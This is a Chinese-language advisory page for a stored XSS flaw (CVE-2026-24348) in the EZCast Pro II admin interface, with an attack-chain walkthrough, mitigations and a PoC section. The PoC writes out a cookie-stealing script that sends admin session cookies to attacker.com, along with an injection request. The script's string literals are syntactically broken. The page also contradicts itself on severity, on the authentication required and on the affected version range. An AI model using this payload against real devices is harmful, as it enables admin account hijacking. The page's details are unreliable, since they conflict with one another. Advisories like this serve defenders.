CVE-2026-24348: EZCast Pro II Admin UI 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-24348

漏洞类型

XSS跨站脚本攻击

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

EZCast Pro II version 1.17478.146

漏洞概述

CVE-2026-24348是存在于EZCast Pro II设备Admin管理界面中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞允许未经认证的攻击者在Admin UI的输入字段中注入恶意JavaScript代码。当其他具有管理员权限的用户访问受感染的页面时，这些恶意脚本会在其浏览器上下文中执行，从而窃取会话Cookie、劫持管理员账户或执行其他恶意操作。由于该漏洞位于设备的管理界面，攻击成功后可能完全控制整个EZCast Pro II设备，影响设备的配置、数据安全和网络环境。漏洞的CVSS评分为6.1，属于中等严重程度，主要因为攻击需要用户交互且影响范围主要限于机密性和完整性的低级别影响。

技术细节

该漏洞为存储型XSS（Stored XSS）漏洞，存在于EZCast Pro II的Web管理界面中。攻击者通过在Admin UI的某个输入参数中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>），该代码被服务器存储并在后续页面访问时未经过滤或转义直接返回给用户。当其他管理员访问包含恶意代码的页面时，浏览器会将其解析为可执行脚本并在当前会话中执行。由于攻击发生在管理界面上下文中，恶意脚本可以访问该域的所有资源，包括窃取管理员的会话令牌、修改设备配置或进行进一步的攻击。由于CVSS向量显示攻击复杂度低（AC:L）且不需要认证（PR:N），但需要用户交互（UI:R），攻击者通常需要诱导管理员访问特定页面或触发相关功能。

攻击链分析

STEP 1

步骤1

攻击者访问EZCast Pro II的Admin管理界面，使用低权限账户或通过其他方式找到存在XSS漏洞的输入字段

STEP 2

步骤2

攻击者在易受攻击的输入字段中注入恶意JavaScript代码，该代码被服务器未经充分过滤直接存储到数据库或配置中

STEP 3

步骤3

当其他管理员用户访问包含恶意内容的页面时，服务器将存储的恶意代码返回给用户浏览器

STEP 4

步骤4

受害者浏览器将恶意代码作为合法脚本执行，攻击者成功在受害者浏览器上下文中执行任意JavaScript代码

STEP 5

步骤5

攻击者通过JavaScript窃取受害者的会话Cookie、劫持管理员账户或执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-24348 Stored XSS PoC for EZCast Pro II Admin UI
// Target: EZCast Pro II version 1.17478.146 Admin Management Interface

// Inject malicious JavaScript via vulnerable input field in Admin UI
// This PoC demonstrates the XSS payload execution

const xssPayload = '<script>\n'
  + '  // Steal admin session cookies
'
  + '  var stolenCookies = document.cookie;
'
  + '  
'
  + '  // Send stolen data to attacker-controlled server
'
  + '  fetch("https://attacker.com/collect?data=" + encodeURIComponent(stolenCookies), {
'
  + '    method: "GET",
'
  + '    mode: "no-cors"
'
  + '  });
'
  + '  
'
  + '  // Alternative payload: DOM-based cookie theft
'
  + '  document.write("<img src=x onerror=\'"
'
  + '    + "fetch(\"https://attacker.com/steal?cookie=" + document.cookie + "\")"
'
  + '    + "\' />");
'
  + '</script>';

// HTTP Request to inject payload (example POST request)
const httpRequest = `POST /admin/settings HTTP/1.1
Host: target-ezcast-pro.local
Content-Type: application/x-www-form-urlencoded
Cookie: admin_session=xxxxx

device_name=${encodeURIComponent(xssPayload)}&submit=Save`;

console.log("XSS Payload Injected:");
console.log(xssPayload);
console.log("\nWhen admin visits the affected page, the script will execute in their browser context.");

影响范围

EZCast Pro II < 1.17478.146

防御指南

临时缓解措施

在官方修复发布之前，建议禁用EZCast Pro II的远程Admin管理功能或限制Admin UI的访问来源，仅允许受信任的内部网络访问管理界面。同时监控管理员账户的可疑活动，并对Admin UI的输入输出进行严格的输入验证和输出编码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-24348
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-24348
3 Details https://www.cvedetails.com/cve/CVE-2026-24348/
4 VulDB https://vuldb.com/cve/CVE-2026-24348
5 Link https://hub.ntc.swiss/ntcf-2025-145332